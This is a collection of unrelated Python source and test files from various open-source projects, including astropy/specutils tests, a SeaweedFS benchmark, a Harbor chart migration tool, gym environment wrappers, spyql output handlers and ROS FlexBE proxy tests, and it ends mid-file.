import pickle import pytest import numpy as np from astropy import units as u from astropy import modeling from specutils.utils import QuantityModel from ..utils.wcs_utils import refraction_index, vac_to_air, air_to_vac wavelengths = [300, 500, 1000] * u.nm data_index_refraction = { 'Griesen2006': np.array([3.07393068, 2.9434858 , 2.8925797 ]), 'Edlen1953': np.array([2.91557413, 2.78963801, 2.74148172]), 'Edlen1966': np.array([2.91554272, 2.7895973 , 2.74156098]), 'PeckReeder1972': np.array([2.91554211, 2.78960005, 2.74152561]), 'Morton2000': np.array([2.91568573, 2.78973402, 2.74169531]), 'Ciddor1996': np.array([2.91568633, 2.78973811, 2.74166131]) } def test_quantity_model(): c = modeling.models.Chebyshev1D(3) uc = QuantityModel(c, u.AA, u.km) assert uc(10*u.nm).to(u.m) == 0*u.m def test_pickle_quantity_model(tmp_path): """ Check that a QuantityModel can roundtrip through pickling, as it would if fit in a multiprocessing pool. """ c = modeling.models.Chebyshev1D(3) uc = QuantityModel(c, u.AA, u.km) pkl_file = tmp_path / "qmodel.pkl" with open(pkl_file, "wb") as f: pickle.dump(uc, f) with open(pkl_file, "rb") as f: new_model = pickle.load(f) assert new_model.input_units == uc.input_units assert new_model.return_units == uc.return_units assert type(new_model.unitless_model) == type(uc.unitless_model) assert np.all(new_model.unitless_model.parameters == uc.unitless_model.parameters) @pytest.mark.parametrize("method", data_index_refraction.keys()) def test_refraction_index(method): tmp = (refraction_index(wavelengths, method) - 1) * 1e4 assert np.isclose(tmp, data_index_refraction[method], atol=1e-7).all() @pytest.mark.parametrize("method", data_index_refraction.keys()) def test_air_to_vac(method): tmp = refraction_index(wavelengths, method) assert np.isclose(wavelengths.value * tmp, air_to_vac(wavelengths, method=method, scheme='inversion').value, rtol=1e-6).all() assert np.isclose(wavelengths.value, air_to_vac(vac_to_air(wavelengths, method=method), method=method, scheme='iteration').value, atol=1e-12).all()
tools/bin/pythonSrc/pychecker-0.8.18/test_input/import37.py
YangHao666666/hawq
450
62846
'd' class Test: 'doc' def x(self): import struct print struct
unmaintain/benchmark/benchmark_seaweedfs.py
zuzhi/rssant
1,176
62985
import aiohttp import asyncio import os import sys import time import random import contextlib seaweedfs_url = 'http://127.0.0.1:9081' def random_content(): return os.urandom(random.randint(1, 10) * 1024) def random_fid(volumes): volume_id = random.choice(volumes) file_key = random.randint(0, 1 << 24) file_key_hex = '%x' % file_key cookie_hex = '00000000' return f'{volume_id},{file_key_hex}{cookie_hex}' class Reporter: def __init__(self): self.items = [] @contextlib.contextmanager def report(self): t0 = time.monotonic() yield value = time.monotonic() - t0 self.items.append(value * 1000) def summary(self, concurrency): n = len(self.items) s = sum(self.items) avg = s / n if n > 0 else 0 s_items = list(sorted(self.items)) result = [f'avg={avg:.1f}'] p_s = [0.5, 0.8, 0.9, 0.95, 0.99] if n > 0: for p in p_s: v = s_items[int(n * p)] result.append('p{}={:.1f}'.format(int(p * 100), v)) qps = (1000 / avg) * concurrency result.append(f'qps={qps:.0f}') print(' '.join(result)) self.items = [] READER_REPORTER = Reporter() WRITER_REPORTER = Reporter() async def put(session, fid: str, content: bytes): url = f'{seaweedfs_url}/{fid}' data = aiohttp.FormData() data.add_field( 'file', content, content_type='application/gzip' ) async with session.put(url, data=data) as response: result = await response.read() return response.status, result async def get(session, fid: str): url = f'{seaweedfs_url}/{fid}' async with session.get(url) as response: result = await response.read() return response.status, result async def reader_task(session, fid_s, n): fid_s = list(fid_s) random.shuffle(fid_s) for fid in fid_s: with READER_REPORTER.report(): status, r = await get(session, fid) assert status == 200, (status, r) async def writer_task(session, fid_s, n): fid_s = list(fid_s) random.shuffle(fid_s) for fid in fid_s: content = random_content() with WRITER_REPORTER.report(): status, r = await put(session, fid, content) assert status in (200, 201, 204), (status, r) async def benchmark(session, num_volume, num_fid, num_round, concurrency): volumes = list(range(20, 20 + num_volume)) fid_s_s = [] for i in range(concurrency): fid_s = [random_fid(volumes) for _ in range(num_fid // concurrency)] fid_s_s.append(fid_s) loop = asyncio.get_event_loop() for n in range(num_round): print(f'{n} ' + '-' * 60) writer_tasks = [] for i in range(concurrency): t = writer_task(session, fid_s_s[i], num_round) writer_tasks.append(loop.create_task(t)) await asyncio.gather(*writer_tasks) WRITER_REPORTER.summary(concurrency) reader_tasks = [] for i in range(concurrency): t = reader_task(session, fid_s_s[i], num_round) reader_tasks.append(loop.create_task(t)) await asyncio.gather(*reader_tasks) READER_REPORTER.summary(concurrency) async def async_main(num_volume, concurrency): print(f'num_volume={num_volume} concurrency={concurrency}') async with aiohttp.ClientSession() as session: await benchmark( session, num_fid=1000, num_round=3, num_volume=num_volume, concurrency=concurrency, ) def main(): num_volume = int(sys.argv[1]) concurrency = int(sys.argv[2]) loop = asyncio.get_event_loop() loop.run_until_complete(async_main(num_volume, concurrency)) if __name__ == "__main__": main()
tools/migrate_chart/migrate_chart.py
kschu91/harbor
12,706
63034
#!/usr/local/bin/python3 import subprocess import signal import sys from pathlib import Path import click import requests MIGRATE_CHART_SCRIPT = '/migrate_chart.sh' HELM_CMD = '/linux-amd64/helm' CA_UPDATE_CMD = 'update-ca-certificates' CHART_URL_PATTERN = "https://{host}/api/v2.0/projects/{project}/repositories/{name}/artifacts/{version}" CHART_SOURCE_DIR = Path('/chart_storage') errs = [] def print_exist_errs(): if errs: click.echo("Following errors exist", err=True) for e in errs: click.echo(e, err=True) def graceful_exit(signum, frame): print_exist_errs() sys.exit() signal.signal(signal.SIGINT, graceful_exit) signal.signal(signal.SIGTERM, graceful_exit) class ChartV2: def __init__(self, filepath:Path): self.filepath = filepath self.project = self.filepath.parts[-2] parts = self.filepath.stem.split('-') flag = False for i in range(len(parts)-1, -1, -1): if parts[i][0].isnumeric(): self.name, self.version = '-'.join(parts[:i]), '-'.join(parts[i:]) flag = True break if not flag: raise Exception('chart name: {} is illegal'.format('-'.join(parts))) def __check_exist(self, hostname, username, password): return requests.get(CHART_URL_PATTERN.format( host=hostname, project=self.project, name=self.name, version=self.version), auth=requests.auth.HTTPBasicAuth(username, password)) def migrate(self, hostname, username, password): res = self.__check_exist(hostname, username, password) if res.status_code == 200: raise Exception("Artifact already exist in harbor") if res.status_code == 401: raise Exception(res.reason) oci_ref = "{host}/{project}/{name}:{version}".format( host=hostname, project=self.project, name=self.name, version=self.version) return subprocess.run([MIGRATE_CHART_SCRIPT, HELM_CMD, self.filepath, oci_ref], text=True, stdout=subprocess.DEVNULL, stderr=subprocess.PIPE) @click.command() @click.option('--hostname', default='127.0.0.1', help='the password to login harbor') @click.option('--username', default='admin', help='The username to login harbor') @click.option('--password', default='<PASSWORD>', help='the password to login harbor') def migrate(hostname, username, password): """ Migrate chart v2 to harbor oci registry """ if username != 'admin': raise Exception('This operation only allowed for admin') subprocess.run([CA_UPDATE_CMD]) subprocess.run([HELM_CMD, 'registry', 'login', hostname, '--username', username, '--password', password]) charts = [ChartV2(c) for p in CHART_SOURCE_DIR.iterdir() if p.is_dir() for c in p.iterdir() if c.is_file() and c.name != "index-cache.yaml"] with click.progressbar(charts, label="Migrating chart ...", length=len(charts), item_show_func=lambda x: "{}/{}:{} total errors: {}".format(x.project, x.name, x.version, len(errs)) if x else '') as bar: for chart in bar: try: result = chart.migrate(hostname, username, password) if result.stderr: errs.append("chart: {name}:{version} in {project} has err: {err}".format( name=chart.name, version=chart.version, project=chart.project, err=result.stderr )) except Exception as e: errs.append("chart: {name}:{version} in {project} has err: {err}".format( name=chart.name, version=chart.version, project=chart.project, err=e)) click.echo("Migration is Done.") print_exist_errs() if __name__ == '__main__': migrate()
opal_common/authentication/types.py
NateKat/opal
367
63068
from enum import Enum from typing import Dict, Any from jwt.algorithms import get_default_algorithms from cryptography.hazmat._types import ( _PRIVATE_KEY_TYPES, _PUBLIC_KEY_TYPES, ) # custom types PrivateKey = _PRIVATE_KEY_TYPES PublicKey = _PUBLIC_KEY_TYPES JWTClaims = Dict[str, Any] class EncryptionKeyFormat(str, Enum): """ represent the supported formats for storing encryption keys. - PEM (https://en.wikipedia.org/wiki/Privacy-Enhanced_Mail) - SSH (RFC4716) or short format (RFC4253, section-6.6, explained here: https://coolaj86.com/articles/the-ssh-public-key-format/) - DER (https://en.wikipedia.org/wiki/X.690#DER_encoding) """ pem = 'pem' ssh = 'ssh' der = 'der' # dynamic enum because pyjwt does not define one # see: https://pyjwt.readthedocs.io/en/stable/algorithms.html for possible values JWTAlgorithm = Enum('JWTAlgorithm', [(k,k) for k in get_default_algorithms().keys()])
bigchaindb/exceptions.py
AbhishaB/bigchaindb
474
63111
<filename>bigchaindb/exceptions.py # Copyright BigchainDB GmbH and BigchainDB contributors # SPDX-License-Identifier: (Apache-2.0 AND CC-BY-4.0) # Code is Apache-2.0 and docs are CC-BY-4.0 class BigchainDBError(Exception): """Base class for BigchainDB exceptions.""" class CriticalDoubleSpend(BigchainDBError): """Data integrity error that requires attention"""
examples/med_sts_clinical.py
anwar1103/semantic-text-similarit
167
63230
<reponame>anwar1103/semantic-text-similarit<filename>examples/med_sts_clinical.py from semantic_text_similarity.models import ClinicalBertSimilarity from scipy.stats import pearsonr model = ClinicalBertSimilarity() predictions = model.predict([("The patient is sick.", "Grass is green."), ("A prescription of acetaminophen 325 mg was given."," The patient was given Tylenol.")]) print(predictions)
Chapter2/ex_2_36.py
zxjzxj9/PyTorchIntroduction
205
63240
<gh_stars>100-1000 """ 该代码仅为演示函数签名所用,并不能实际运行 """ save_info = { # 保存的信息 "iter_num": iter_num, # 迭代步数 "optimizer": optimizer.state_dict(), # 优化器的状态字典 "model": model.state_dict(), # 模型的状态字典 } # 保存信息 torch.save(save_info, save_path) # 载入信息 save_info = torch.load(save_path) optimizer.load_state_dict(save_info["optimizer"]) model.load_state_dict(sae_info["model"])
utils/wrappers.py
pacificlion/world_models
106
63252
<reponame>pacificlion/world_models # Copyright 2020 Google LLC # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Environment wrappers.""" from __future__ import absolute_import from __future__ import division from __future__ import print_function import gym import numpy as np from PIL import Image from world_models.utils import nested class ObservationDict(gym.Wrapper): """Changes the observation space to be a dict.""" def __init__(self, env, key='observ'): self._key = key self.env = env def __getattr__(self, name): return getattr(self.env, name) @property def observation_space(self): spaces = {self._key: self.env.observation_space} return gym.spaces.Dict(spaces) @property def action_space(self): return self.env.action_space def step(self, action): obs, reward, done, info = self.env.step(action) obs = {self._key: np.array(obs)} return obs, reward, done, info def reset(self): obs = self.env.reset() obs = {self._key: np.array(obs)} return obs class ActionRepeat(gym.Wrapper): """Repeats the same action `n` times and returns the last step results.""" def __init__(self, env, n): super(ActionRepeat, self).__init__(env) assert n >= 1 self._n = n def __getattr__(self, name): return getattr(self.env, name) def step(self, action): done = False total_reward = 0 current_step = 0 while current_step < self._n and not done: observ, reward, done, info = self.env.step(action) total_reward += reward current_step += 1 return observ, total_reward, done, info class ActionNormalize(gym.Env): """Normalizes the action space.""" def __init__(self, env): self._env = env self._mask = np.logical_and( np.isfinite(env.action_space.low), np.isfinite(env.action_space.high)) self._low = np.where(self._mask, env.action_space.low, -1) self._high = np.where(self._mask, env.action_space.high, 1) def __getattr__(self, name): return getattr(self._env, name) @property def action_space(self): low = np.where(self._mask, -np.ones_like(self._low), self._low) high = np.where(self._mask, np.ones_like(self._low), self._high) return gym.spaces.Box(low, high, dtype=np.float32) def step(self, action): original = (action + 1) / 2 * (self._high - self._low) + self._low original = np.where(self._mask, original, action) return self._env.step(original) def reset(self): return self._env.reset() def render(self, mode='human'): return self._env.render(mode=mode) class MaximumDuration(gym.Wrapper): """Force sets `done` after the specified duration.""" def __init__(self, env, duration): super(MaximumDuration, self).__init__(env) self._duration = duration self._step = None def __getattr__(self, name): return getattr(self.env, name) def step(self, action): if self._step is None: raise RuntimeError('Must reset environment.') observ, reward, done, info = self.env.step(action) self._step += 1 if self._step >= self._duration: done = True self._step = None return observ, reward, done, info def reset(self): self._step = 0 return self.env.reset() class MinimumDuration(gym.Wrapper): """Force resets `done` before the specified duration.""" def __init__(self, env, duration): super(MinimumDuration, self).__init__(env) self._duration = duration self._step = None def __getattr__(self, name): return getattr(self.env, name) def step(self, action): observ, reward, done, info = self.env.step(action) self._step += 1 if self._step < self._duration: done = False return observ, reward, done, info def reset(self): self._step = 0 return self.env.reset() class ConvertTo32Bit(gym.Wrapper): """Converts observation and rewards to int/float32.""" def __getattr__(self, name): return getattr(self.env, name) def step(self, action): observ, reward, done, info = self.env.step(action) observ = nested.map(self._convert_observ, observ) reward = self._convert_reward(reward) return observ, reward, done, info def reset(self): observ = self.env.reset() observ = nested.map(self._convert_observ, observ) return observ def _convert_observ(self, observ): if not np.isfinite(observ).all(): raise ValueError('Infinite observation encountered.') if observ.dtype == np.float64: return observ.astype(np.float32) if observ.dtype == np.int64: return observ.astype(np.int32) return observ def _convert_reward(self, reward): if not np.isfinite(reward).all(): raise ValueError('Infinite reward encountered.') return np.array(reward, dtype=np.float32) class RenderObservation(gym.Env): """Changes the observation space to rendered frames.""" def __init__(self, env, size=(64, 64), dtype=np.uint8, key='image'): assert isinstance(env.observation_space, gym.spaces.Dict) self.env = env self._size = size self._dtype = dtype self._key = key def __getattr__(self, name): return getattr(self.env, name) @property def observation_space(self): high = {np.uint8: 255, np.float: 1.0}[self._dtype] image = gym.spaces.Box(0, high, self._size + (3,), dtype=self._dtype) spaces = self.env.observation_space.spaces.copy() assert self._key not in spaces spaces[self._key] = image return gym.spaces.Dict(spaces) @property def action_space(self): return self.env.action_space def step(self, action): obs, reward, done, info = self.env.step(action) obs[self._key] = self._render_image() return obs, reward, done, info def reset(self): obs = self.env.reset() obs[self._key] = self._render_image() return obs def _render_image(self): """Renders the environment and processes the image.""" image = self.env.render('rgb_array') if image.shape[:2] != self._size: image = np.array(Image.fromarray(image).resize(self._size)) if self._dtype and image.dtype != self._dtype: if image.dtype in (np.float32, np.float64) and self._dtype == np.uint8: image = (image * 255).astype(self._dtype) elif image.dtype == np.uint8 and self._dtype in (np.float32, np.float64): image = image.astype(self._dtype) / 255 else: message = 'Cannot convert observations from {} to {}.' raise NotImplementedError(message.format(image.dtype, self._dtype)) return image class DeepMindEnv(gym.Env): """Wrapper for deepmind MuJoCo environments to expose gym env methods.""" metadata = {'render.modes': ['rgb_array']} reward_range = (-np.inf, np.inf) def __init__(self, env, render_size=(64, 64), camera_id=0): self._env = env self._render_size = render_size self._camera_id = camera_id def __getattr__(self, name): return getattr(self._env, name) @property def observation_space(self): components = {} for key, value in self._env.observation_spec().items(): components[key] = gym.spaces.Box( -np.inf, np.inf, value.shape, dtype=np.float32) return gym.spaces.Dict(components) @property def action_space(self): action_spec = self._env.action_spec() return gym.spaces.Box( action_spec.minimum, action_spec.maximum, dtype=np.float32) def step(self, action): time_step = self._env.step(action) obs = dict(time_step.observation) reward = time_step.reward or 0 done = time_step.last() info = {'discount': time_step.discount} return obs, reward, done, info def reset(self): time_step = self._env.reset() return dict(time_step.observation) def render(self, *args, **kwargs): if kwargs.get('mode', 'rgb_array') != 'rgb_array': raise ValueError("Only render mode 'rgb_array' is supported.") del args # Unused del kwargs # Unused return self._env.physics.render( *self._render_size, camera_id=self._camera_id) def get_state(self): return ( np.array(self.physics.data.qpos), np.array(self.physics.data.qvel), np.array(self.physics.data.ctrl), np.array(self.physics.data.act)) def set_state(self, state): with self.physics.reset_context(): self.physics.data.qpos[:] = state[0] self.physics.data.qvel[:] = state[1] self.physics.data.ctrl[:] = state[2] self.physics.data.act[:] = state[3]
pytorch_pfn_extras/distributed/__init__.py
belltailjp/pytorch-pfn-extras
243
63275
<gh_stars>100-1000 from pytorch_pfn_extras.distributed._dataset_util import create_distributed_subset_indices # NOQA
lightnet/__init__.py
rversaw/lightnet
345
63279
<reponame>rversaw/lightnet<gh_stars>100-1000 # coding: utf8 from __future__ import unicode_literals from .lightnet import Network, Image, BoxLabels from .about import __version__ def load(name, path=None): return Network.load(name, path=path)
ghida_plugin/ghidra_plugin/FunctionDecompile.py
wumb0/GhIDA
675
63288
<filename>ghida_plugin/ghidra_plugin/FunctionDecompile.py #!/usr/bin/env python3 # -*- coding: utf-8 -*- ############################################################################## # # # FunctionDecompile - Ghidra plugin # # # # Copyright 2019 <NAME>, <NAME> # # # # Licensed under the Apache License, Version 2.0 (the "License"); # # you may not use this file except in compliance with the License. # # You may obtain a copy of the License at # # # # http://www.apache.org/licenses/LICENSE-2.0 # # # # Unless required by applicable law or agreed to in writing, software # # distributed under the License is distributed on an "AS IS" BASIS, # # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # # See the License for the specific language governing permissions and # # limitations under the License. # # # ############################################################################## import json import sys try: args = getScriptArgs() response_dict = dict() if len(args) < 2: print("usage: ./FunctionDecompile.py function_address output_path") sys.exit(0) decompInterface = ghidra.app.decompiler.DecompInterface() decompInterface.openProgram(currentProgram) # function_address mush be in hex format, with an optional ending 'L' address = int(args[0].rstrip("L"), 16) # output_path of the json file (should terminate with ".json") output_path = args[1] found = False response_dict['address'] = address functionIterator = currentProgram.getFunctionManager().getFunctions(True) for function in functionIterator: if function.getEntryPoint().getOffset() == address: decompileResults = decompInterface.decompileFunction( function, 30, monitor) if decompileResults.decompileCompleted(): decompiledFunction = decompileResults.getDecompiledFunction() decompiled = decompiledFunction.getC() response_dict['status'] = "completed" response_dict['decompiled'] = decompiled else: response_dict['status'] = "error" found = True break if not found: response_dict['status'] = "error" with open(output_path, "w") as f_out: json.dump(response_dict, f_out) print("Json saved to %s" % output_path) except Exception: response_dict['status'] = "error" print(json.dumps(response_dict))
spyql/output_handler.py
alin23/spyql
432
63315
<reponame>alin23/spyql from spyql.nulltype import Null class OutputHandler: """Mediates data processing with data writting""" @staticmethod def make_handler(prs): """ Chooses the right handler depending on the kind of query and eventual optimization opportunities """ if prs["group by"] and not prs["partials"]: return GroupByDelayedOutSortAtEnd( prs["order by"], prs["limit"], prs["offset"] ) if prs["order by"]: # TODO optimization: use special handler that only keeps the top n elements # in memory when LIMIT is defined if prs["distinct"]: return DistinctDelayedOutSortAtEnd( prs["order by"], prs["limit"], prs["offset"] ) return DelayedOutSortAtEnd(prs["order by"], prs["limit"], prs["offset"]) if prs["distinct"]: return LineInDistinctLineOut(prs["limit"], prs["offset"]) return LineInLineOut(prs["limit"], prs["offset"]) def __init__(self, limit, offset): self.limit = limit self.rows_written = 0 self.offset = offset if offset else 0 def set_writer(self, writer): self.writer = writer def handle_result(self, result, group_key, sort_keys): """ To be implemented by child classes to handle a new output row (aka result). All inputs should be tuples. """ return self.is_done() def is_done(self): # premature ending return self.limit is not None and self.rows_written >= self.limit def write(self, row): if self.offset > 0: self.offset = self.offset - 1 else: self.writer.writerow(row) self.rows_written = self.rows_written + 1 def finish(self): self.writer.flush() class LineInLineOut(OutputHandler): """Simple handler that immediately writes every processed row""" def handle_result(self, result, *_): self.write(result) return self.is_done() def finish(self): super().finish() class LineInDistinctLineOut(OutputHandler): """In-memory distinct handler that immediately writes every non-duplicated row""" def __init__(self, limit, offset): super().__init__(limit, offset) self.output_rows = set() def handle_result(self, result, *_): # uses a dict to store distinct results instead of storing all rows if result in self.output_rows: return False # duplicate self.output_rows.add(result) self.write(result) return self.is_done() def finish(self): super().finish() class DelayedOutSortAtEnd(OutputHandler): """ Only writes after collecting and sorting all data. Temporary implementation that reads every processed row into memory. """ def __init__(self, orderby, limit, offset): super().__init__(limit, offset) self.orderby = orderby self.output_rows = [] def handle_result(self, result, sort_keys, *_): self.output_rows.append({"data": result, "sort_keys": sort_keys}) # TODO use temporary files to write `output_rows` whenever it gets too large # TODO sort intermediate results before writing to a temporary file return False # no premature endings here def finish(self): # TODO read and merge previously sorted temporary files (look into heapq.merge) # 1. sorts everything if self.orderby: for i in reversed(range(len(self.orderby))): # taking advantage of list.sort being stable to sort elements from minor # to major criteria (not be the most efficient way but straightforward) self.output_rows.sort( key=lambda row: ( # handle of NULLs based on NULLS FIRST/LAST specification (row["sort_keys"][i] is Null) != self.orderby[i]["rev_nulls"], row["sort_keys"][i], ), reverse=self.orderby[i]["rev"], # handles ASC/DESC order ) # 2. writes sorted rows to output for row in self.output_rows: # it would be more efficient to slice `output_rows` based on limit/offset # however, this is more generic with less repeated logic and this is a # temporary implementation if self.is_done(): break self.write(row["data"]) super().finish() class GroupByDelayedOutSortAtEnd(DelayedOutSortAtEnd): """ Extends `DelayedOutSortAtEnd` to only store intermediate group by results instead of keeping all rows in memory """ def __init__(self, orderby, limit, offset): super().__init__(orderby, limit, offset) self.output_rows = dict() def handle_result(self, result, sort_keys, group_key): # uses a dict to store intermidiate group by results instead of storing all rows self.output_rows[group_key] = {"data": result, "sort_keys": sort_keys} return False # no premature endings here def finish(self): # converts output_rows dict to list so that it can be sorted and written self.output_rows = list(self.output_rows.values()) super().finish() class DistinctDelayedOutSortAtEnd(DelayedOutSortAtEnd): """ Alters `DelayedOutSortAtEnd` to only store distinct results instead of keeping all rows in memory """ def __init__(self, orderby, limit, offset): super().__init__(orderby, limit, offset) self.output_rows = dict() def handle_result(self, result, sort_keys, *_): # uses a dict to store distinct results instead of storing all rows if result not in self.output_rows: self.output_rows[result] = sort_keys return False # no premature endings here def finish(self): # converts output_rows dict to list so that it can be sorted and written self.output_rows = [ {"data": k, "sort_keys": v} for k, v in self.output_rows.items() ] super().finish()
tests/gamestonk_terminal/stocks/quantitative_analysis/test_factors_view.py
elan17/GamestonkTerminal
1,835
63326
<filename>tests/gamestonk_terminal/stocks/quantitative_analysis/test_factors_view.py<gh_stars>1000+ # IMPORTATION STANDARD # IMPORTATION THIRDPARTY import pytest # IMPORTATION INTERNAL from gamestonk_terminal.stocks.quantitative_analysis import factors_view @pytest.fixture(scope="module") def vcr_config(): return { "filter_headers": [("User-Agent", None)], "filter_query_parameters": [ ("period1", "1598220000"), ("period2", "1635980400"), ], } @pytest.mark.vcr @pytest.mark.record_stdout def test_capm_view(): factors_view.capm_view(ticker="PM")
wikum/statistics/analyze_initiators.py
xuericlin/wikum
114
63375
<reponame>xuericlin/wikum from __future__ import print_function # coding: utf-8 # In[1]: from builtins import zip get_ipython().magic(u'matplotlib inline') import MySQLdb import pandas as pd import matplotlib import matplotlib.pyplot as plt plt.rcParams["figure.figsize"] = [20,12] # In[2]: conn = MySQLdb.connect(host='localhost', user='root', passwd='<PASSWORD>', db='wikumnewdb') cursor = conn.cursor() # In[3]: cursor.execute("select text, username, website_comment.created_at, url from website_opencomment INNER JOIN website_article on website_opencomment.article_id = website_article.id INNER JOIN website_commentauthor on website_opencomment.author_id = website_commentauthor.id INNER JOIN website_comment on website_opencomment.comment_id = website_comment.id") rows = cursor.fetchall() # In[9]: # How many RfCs are opened per month? open_dates = [data[2] for data in rows] df = pd.DataFrame(index=open_dates) df['count'] = [1]*len(open_dates) resampled_df = df.resample('1M', label='right').sum() # In[5]: fig, ax = plt.subplots() ax.plot(resampled_df.index, resampled_df['count']) fig.suptitle('RfCs initiated', fontsize=20, fontweight='bold',y=0.05) years = plt.matplotlib.dates.YearLocator() months = plt.matplotlib.dates.MonthLocator(interval=3) yearsFmt = plt.matplotlib.dates.DateFormatter('%Y') monthsFmt = plt.matplotlib.dates.DateFormatter('%b') ax.xaxis.set_major_locator(years) ax.xaxis.set_major_formatter(yearsFmt) ax.xaxis.set_minor_locator(months) ax.xaxis.set_minor_formatter(monthsFmt) ax.set_xlabel("Date") ax.set_ylabel("Number of RfCs initiated") ax.xaxis.grid(True) ax.yaxis.grid(True) labels = ax.get_xticklabels() #"both" gives ugly formatting plt.setp(labels, rotation=30, fontsize=15) for xy in zip(resampled_df.index, resampled_df['count']): ax.annotate(xy[1], xy=xy, textcoords='data') plt.show() # In[6]: # Maximum RfCs initiated in a month resampled_df.idxmax() resampled_df.max() print(int(resampled_df.max())) # In[7]: # Top openers df = pd.DataFrame( [[ij for ij in i] for i in rows] ) df.rename(columns={0:'text', 1:'user name', 2:'date', 3:'url'}, inplace=True) opening_counts = pd.DataFrame(df.groupby('user name').size().rename('total openings')) opening_counts.sort_values(by='total openings', ascending=False, inplace=True) opening_counts.iloc[0:30] # In[ ]:
experimental/gradient_noise/plot_noise.py
Pandinosaurus/KungFu
291
63386
<filename>experimental/gradient_noise/plot_noise.py import re import matplotlib import matplotlib.cm as cm import matplotlib.patches as mpatches import matplotlib.pyplot as plt import numpy as np # Regex used to match relevant loglines (in this case, a specific IP address) line_regex = re.compile(r".*$") def get_experiment_results(log_file, match_function): results = [] with open(log_file, "r") as in_file: for line in in_file: if (line_regex.search(line)): match = match_function(line) if match is not None: results.append(match) return results def extract_from_worker(s, from_worker): pattern = re.compile(r"\[.*/0" + str(from_worker) + r"/.*\].*", re.VERBOSE) match = pattern.match(s) if match is None: return None return s def print_none_match(pattern, l): print(pattern.pattern) raise Exception(l) def get_loss(s): pattern = re.compile(r".*\)\t(?P<loss>\d+\.\d+)\t.*", re.VERBOSE) match = pattern.match(s) if match is None: return None return float(match.group("loss")) def get_noise(s): pattern = re.compile(r".*iteration\[(?P<noise>[\-\+]?\d+\.\d+)\]\n", re.VERBOSE) match = pattern.match(s) if match is None: return None return float(match.group("noise")) def plot(lines): losses = [get_loss(l) for l in lines] losses = filter(None, losses) noises = [get_noise(l) for l in lines] noises = filter(None, noises) pairs = zip(losses, noises) pairs.sort(key=lambda x: x[0]) print(pairs) losses, noises = zip(*pairs) plt.ylim([-200000, 200000]) plt.title('ResNet-32 gradient noise scale') plt.ylabel('Gradient Noise') plt.xlabel('Training Loss') plt.plot(losses, noises) plt.show() def main(): num_workers = 1 workers = [] for worker in range(num_workers): worker = get_experiment_results( './correctnoise-tensorboard.log', lambda x: extract_from_worker(x, worker)) workers.append(worker) for worker_logs in workers: plot(worker_logs) if __name__ == "__main__": main()
python/intro.py
surabhi226005/functional-programming-learning-path
627
63389
# Assign functions to a variable def add(a, b): return a + b plus = add value = plus(1, 2) print(value) # 3 # Lambda value = (lambda a, b: a + b)(1, 2) print(value) # 3 addition = lambda a, b: a + b value = addition(1, 2) print(value) # 3 authors = [ '<NAME>', '<NAME>', '<NAME>', '<NAME>', '<NAME>', '<NAME>' ] sorted_authors_by_name_length = sorted(authors, key=len) print(sorted_authors_by_name_length) sorted_authors_by_last_name = sorted(authors, key=lambda name: name.split()[-1]) print(sorted_authors_by_last_name)
basic-example/test.py
tr4r3x/remora
206
63409
#!/usr/bin/python import requests def check(): data = {} consumers = requests.get('http://localhost:9000/consumers').json() for consumer_group in consumers: consumer_infos = requests.get( 'http://localhost:9000/consumers/{consumer_group}'.format( consumer_group=consumer_group)).json() for partition in consumer_infos['partition_assignment']: data[ '{consumer_group}-{topic}-{partition}-lag'.format( consumer_group=consumer_group, topic=partition['topic'], partition=partition['partition'])] = partition['lag'] data[ '{consumer_group}-{topic}-{partition}-log_end_offset'.format( consumer_group=consumer_group, topic=partition['topic'], partition=partition['partition'])] = partition['log_end_offset'] data[ '{consumer_group}-{topic}-{partition}-offset'.format( consumer_group=consumer_group, topic=partition['topic'], partition=partition['partition'])] = partition['offset'] print(data) return data if __name__ == "__main__": check()
flexbe_core/test/test_proxies.py
duwke/flexbe_behavior_engine
119
63430
<reponame>duwke/flexbe_behavior_engine<gh_stars>100-1000 #!/usr/bin/env python import unittest import rospy import actionlib from flexbe_core.proxy import ProxyPublisher, ProxySubscriberCached, ProxyActionClient, ProxyServiceCaller from std_msgs.msg import String from std_srvs.srv import Trigger, TriggerRequest from flexbe_msgs.msg import BehaviorExecutionAction, BehaviorExecutionGoal, BehaviorExecutionResult class TestProxies(unittest.TestCase): def test_publish_subscribe(self): t1 = '/pubsub_1' t2 = '/pubsub_2' pub = ProxyPublisher({t1: String}) pub = ProxyPublisher({t2: String}, _latch=True) sub = ProxySubscriberCached({t1: String}) self.assertTrue(pub.is_available(t1)) self.assertTrue(pub.wait_for_any(t1)) self.assertFalse(pub.wait_for_any(t2)) pub.publish(t1, String('1')) pub.publish(t2, String('2')) rospy.sleep(.5) # make sure latched message is sent before subscriber is added sub = ProxySubscriberCached({t2: String}) rospy.sleep(.5) # make sure latched message can be received before checking self.assertTrue(sub.has_msg(t1)) self.assertEqual(sub.get_last_msg(t1).data, '1') sub.remove_last_msg(t1) self.assertFalse(sub.has_msg(t1)) self.assertIsNone(sub.get_last_msg(t1)) self.assertTrue(sub.has_msg(t2)) self.assertEqual(sub.get_last_msg(t2).data, '2') def test_subscribe_buffer(self): t1 = '/buffered_1' pub = ProxyPublisher({t1: String}) sub = ProxySubscriberCached({t1: String}) sub.enable_buffer(t1) self.assertTrue(pub.wait_for_any(t1)) pub.publish(t1, String('1')) pub.publish(t1, String('2')) rospy.sleep(.5) # make sure messages can be received self.assertTrue(sub.has_msg(t1)) self.assertTrue(sub.has_buffered(t1)) self.assertEqual(sub.get_from_buffer(t1).data, '1') pub.publish(t1, String('3')) rospy.sleep(.5) # make sure messages can be received self.assertEqual(sub.get_from_buffer(t1).data, '2') self.assertEqual(sub.get_from_buffer(t1).data, '3') self.assertIsNone(sub.get_from_buffer(t1)) self.assertFalse(sub.has_buffered(t1)) def test_service_caller(self): t1 = '/service_1' rospy.Service(t1, Trigger, lambda r: (True, 'ok')) srv = ProxyServiceCaller({t1: Trigger}) result = srv.call(t1, TriggerRequest()) self.assertIsNotNone(result) self.assertTrue(result.success) self.assertEqual(result.message, 'ok') self.assertFalse(srv.is_available('/not_there')) srv = ProxyServiceCaller({'/invalid': Trigger}, wait_duration=.1) self.assertFalse(srv.is_available('/invalid')) def test_action_client(self): t1 = 